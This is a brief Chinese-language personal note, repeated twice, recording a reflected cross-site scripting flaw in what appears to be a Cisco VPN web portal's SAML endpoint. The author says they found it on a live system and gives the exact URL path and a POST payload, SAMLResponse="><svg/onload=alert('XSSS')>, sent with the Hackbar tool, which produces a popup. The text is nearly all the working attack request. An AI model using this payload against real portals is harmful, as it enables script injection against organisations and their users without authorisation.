今天正好碰到这个系统,找了下存在这个漏洞,记录下
是这个界面的,就打开hackbar,注意url后面部分和post部分
URL部分
/+CSCOE+/saml/sp/acs?tgname=a
POST部分
SAMLResponse="><svg/onload=alert('XSSS')>
执行后就会弹窗
今天正好碰到这个系统,找了下存在这个漏洞,记录下
是这个界面的,就打开hackbar,注意url后面部分和post部分
URL部分
/+CSCOE+/saml/sp/acs?tgname=a
POST部分
SAMLResponse="><svg/onload=alert('XSSS')>
执行后就会弹窗